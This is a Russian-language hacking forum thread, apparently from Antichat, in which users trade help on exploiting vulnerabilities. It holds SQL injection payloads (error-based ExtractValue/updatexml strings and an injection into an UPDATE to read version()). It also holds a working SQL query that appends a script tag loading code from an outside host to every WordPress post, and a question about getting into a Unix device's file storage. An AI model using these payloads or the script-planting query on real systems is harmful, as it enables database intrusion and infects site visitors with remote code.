Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Code:
    select * from users where id='123 '' or(ExtractValue(1,version())) -- \'
    Непонял получяются 3 кавычке запрос не выполнется
     
  2. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    по пробуй updatexml
     
  3. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    86
    Likes Received:
    69
    Reputations:
    3
    Иньекция в limit'е после order by. Советую ознакомиться
    https://rdot.org/forum/showpost.php?p=36186&postcount=30
     
    garrik, erwerr2321 and crlf like this.
  4. Kirza

    Kirza Member

    Joined:
    12 Mar 2013
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    как то так:

    update wp_post set post_content=post_content+'JSSCRIPT'
     
    _________________________
  6. Kirza

    Kirza Member

    Joined:
    12 Mar 2013
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    --- походу не так расписал таблицы #1146 - Table 'wordpress1.wp_post' doesn't exist
    БД wordpress1 > wp_post > post_content
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Вам пример кинули, вектор, значение вы свои подставляйте .
     
  8. Kirza

    Kirza Member

    Joined:
    12 Mar 2013
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Суть понятна - просто текст - добавился на ура - скрипт - не хочет ( пробовал разными путями со скобками - ток же 0
     
  9. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Напиши свой код. Телепатов нет.
     
  10. Kirza

    Kirza Member

    Joined:
    12 Mar 2013
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    А толку? Всё равно скрипт не сработает? Иными словами, вы так же можете написать это в форму сообщения. СКРИПТ будет как ткст,
     
  12. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Code:
    UPDATE wp_posts SET post_content = CONCAT(post_content, '<script src="http://sinus.ru/pid.php?kye=8cc3b&throttle=0.5&se_check=false"></script>');
    
     
    eminlayer7788 likes this.
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Ну засунь значение в хекс:
     
    _________________________
  14. VKAPI

    VKAPI Member

    Joined:
    25 Nov 2011
    Messages:
    142
    Likes Received:
    68
    Reputations:
    0
    помогите с решение..
    Есть устройство на Уникс..
    Подключенно к моей вафле по роутру на Linux

    как раскопать хранилище файлов устройсва..
    при условии что устройсво у меня в руке.
    SSH не удалось из за отсутвия опыта серьёзного
     
  15. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    КАК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"?
    Code:
    # Запрещено выполнение любого кода в директории загрузке файлов
    php_flag engine 0
    RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
    AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
     
  16. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Octavian likes this.
  17. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
    Code:
    update users_cards set cardno = ''', name = '' where id_users=65 and id=33
    ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
    
    такая же есть с insert
     
  18. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Если где-то видно name, то можно сделать так:
    Code:
    123', name = version() where id_users=65 and id=33 #
    
    где 123 валидный cardno.

    Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.
     
    foozzione likes this.
  19. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    коммент не канает... ни --, ни #
     
  20. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Что пишет?